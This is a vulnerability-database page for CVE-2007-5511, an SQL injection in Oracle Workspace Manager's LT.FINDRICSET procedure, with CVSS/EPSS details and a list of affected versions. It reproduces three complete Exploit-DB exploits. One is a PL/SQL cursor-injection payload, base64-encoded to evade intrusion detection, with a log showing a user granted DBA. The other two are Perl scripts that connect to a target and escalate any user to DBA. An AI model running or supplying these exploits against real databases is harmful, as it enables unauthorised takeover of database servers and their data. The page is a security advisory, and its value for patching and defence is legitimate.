CVE-2007-5511
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 allows attackers to execute arbitrary SQL commands via the FINDRICSET procedure in the LT package. NOTE: this is probably covered by CVE-2007-5510, but there are insufficient details to be certain.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.5 | AV:N/AC:L/Au:S/C:P/I:P/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4572
Publication date : 2007-10-26 22h00 +00:00
Author : sh2kerr
EDB Verified : Yes
/******************************************************************/
/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/
/******************************************************************/
/*********** sploit grant DBA to scott **************/
/*********** evil cursor injection **************/
/*********** No "create procedure" privileg needed! **************/
/*********** + Funny IDS evasion vith base64 **************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXPLOIT: October 26, 2007 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: [email protected] */
/* site: http://www.dsec.ru */
/******************************************************************/
/* Original Advisory by: */
/* David Litchfield [ [email protected] ] */
/* Reported: 22nd August 2006 */
/* Date of Public Advisory: October 17, 2007 */
/* Advisory number: #NISR17102007B */
/* */
/******************************************************************/
/* P.S. Special thanks David Litchfield for all his work **/
/******************************************************************/
/* you may need some tweaks to make it work with other users except skott :) */
select * from user_role_privs;
DECLARE
c2gya2Vy NUMBER;
BEGIN
c2gya2Vy := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UV
Cc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0);
SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF');
END;
select * from user_role_privs;
-----------------------------LOG---------------------------------------------
-- -- --SQL*Plus: Release 10.1.0.2.0 - Production on Fri Oct 26 16:51:39 2007 -- --Copyright (c) 1982, 2004, Oracle. All rights reserved. -- -- --Connected to: --Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production --With the Partitioning, OLAP and Data Mining options -- -- -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> DECLARE -- 2 c2gya2Vy NUMBER; -- 3 BEGIN -- 4 c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -- 5 DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25 --vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09 --UVCc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); --6 SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql. --execute('||c2gya2Vy||')||''','DEADBEAF'); --7 END; --8 / --TGV2ZWWGMSBJB21SZXRLIDOP.U2VLLNUUBGF0ZXIP1 -- --PL/SQL procedure successfully completed. -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT DBA NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> -- -- --
// milw0rm.com [2007-10-27]
Exploit Database EDB-ID : 4570
Publication date : 2007-10-26 22h00 +00:00
Author : bunker
EDB Verified : Yes
#!/usr/bin/perl
#
# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricset.pl
#
# Oracle SYS.LT.FINDRICSET exploit (11g/10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0"
#
# Fixed with CPU Oct. 2007
#
# REF: Thanks to Joxean Koret and his excellent Inguma
# http://sourceforge.net/projects/inguma
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r
# [-] Wait...
# [-] Revoking DBA from SFIGATO...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricset.pl line 86.
# [-] Done!
#
# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -g
# [-] Wait...
# [-] Creating evil function...
# [-] Go...
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r
# [-] Wait...
# [-] Revoking DBA from SFIGATO...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil function...\n";
$dbh->do( qq{
CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
RETURN(0);
END;
} );
print "[-] Go...\n";
my $sth = $dbh->prepare( qq{
BEGIN
SYS.LT.FINDRICSET('.''||$user.own||'''')--','x');
END;});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-10-27]
Exploit Database EDB-ID : 4571
Publication date : 2007-10-26 22h00 +00:00
Author : bunker
EDB Verified : Yes
#!/usr/bin/perl
#
# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.pl
#
# Oracle SYS.LT.FINDRICSET exploit (11g/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0"
#
# Fixed with CPU Oct. 2007
#
# REF: Thanks to Joxean Koret and his excellent Inguma
# http://sourceforge.net/projects/inguma
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r
# [-] Wait...
# [-] Revoking DBA from SFIGATO...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricsetV2.pl line 69.
# [-] Done!
#
# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 1
# [-] Go...
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r
# [-] Wait...
# [-] Revoking DBA from SFIGATO...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go...\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.LT.FINDRICSET('.''||dbms_sql.execute($cursor)||'''')--','x');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-10-27]
Products Mentioned
Configuraton 0
Oracle>>Database_server >> Version *
- Oracle>>Database_server >> Version - (Open CPE detail)
- Oracle>>Database_server >> Version - (Open CPE detail)
- Oracle>>Database_server >> Version 1.0.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 1.0.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 4.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 4.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 4.2.0 (Open CPE detail)
- Oracle>>Database_server >> Version 4.2.3 (Open CPE detail)
- Oracle>>Database_server >> Version 5.1 (Open CPE detail)
- Oracle>>Database_server >> Version 7 (Open CPE detail)
- Oracle>>Database_server >> Version 7.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 7.0.64 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.4 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.5.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.6.3 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.6 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.2.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.2.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8dv (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8dv (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.3 (Open CPE detail)
- Oracle>>Database_server >> Version 11 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 11g (Open CPE detail)
- Oracle>>Database_server >> Version 12.1.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 12.1.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 12.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 12c (Open CPE detail)
- Oracle>>Database_server >> Version 18 (Open CPE detail)
- Oracle>>Database_server >> Version 18.1 (Open CPE detail)
- Oracle>>Database_server >> Version 18.1.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 18.2 (Open CPE detail)
- Oracle>>Database_server >> Version 18c (Open CPE detail)
- Oracle>>Database_server >> Version 19.1 (Open CPE detail)
- Oracle>>Database_server >> Version 19.3 (Open CPE detail)
- Oracle>>Database_server >> Version 19.3 (Open CPE detail)
- Oracle>>Database_server >> Version 19.4 (Open CPE detail)
- Oracle>>Database_server >> Version 19.5 (Open CPE detail)
- Oracle>>Database_server >> Version 19.6 (Open CPE detail)
- Oracle>>Database_server >> Version 19.7 (Open CPE detail)
- Oracle>>Database_server >> Version 19.8 (Open CPE detail)
- Oracle>>Database_server >> Version 19.9 (Open CPE detail)
- Oracle>>Database_server >> Version 19.10 (Open CPE detail)
- Oracle>>Database_server >> Version 19.11 (Open CPE detail)
- Oracle>>Database_server >> Version 19.12 (Open CPE detail)
- Oracle>>Database_server >> Version 19.13 (Open CPE detail)
- Oracle>>Database_server >> Version 19.14 (Open CPE detail)
- Oracle>>Database_server >> Version 19.15 (Open CPE detail)
- Oracle>>Database_server >> Version 19.16 (Open CPE detail)
- Oracle>>Database_server >> Version 19.17 (Open CPE detail)
- Oracle>>Database_server >> Version 19.18 (Open CPE detail)
- Oracle>>Database_server >> Version 19.19 (Open CPE detail)
- Oracle>>Database_server >> Version 19.20 (Open CPE detail)
- Oracle>>Database_server >> Version 19.20 (Open CPE detail)
- Oracle>>Database_server >> Version 19.21 (Open CPE detail)
- Oracle>>Database_server >> Version 19.22 (Open CPE detail)
- Oracle>>Database_server >> Version 19.23 (Open CPE detail)
- Oracle>>Database_server >> Version 19c (Open CPE detail)
- Oracle>>Database_server >> Version 21.3 (Open CPE detail)
- Oracle>>Database_server >> Version 21.3 (Open CPE detail)
- Oracle>>Database_server >> Version 21.11 (Open CPE detail)
- Oracle>>Database_server >> Version 21.12 (Open CPE detail)
- Oracle>>Database_server >> Version 21.13 (Open CPE detail)
- Oracle>>Database_server >> Version 21c (Open CPE detail)
References
http://www.securityfocus.com/archive/1/482429/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
2025©
tesweb SA
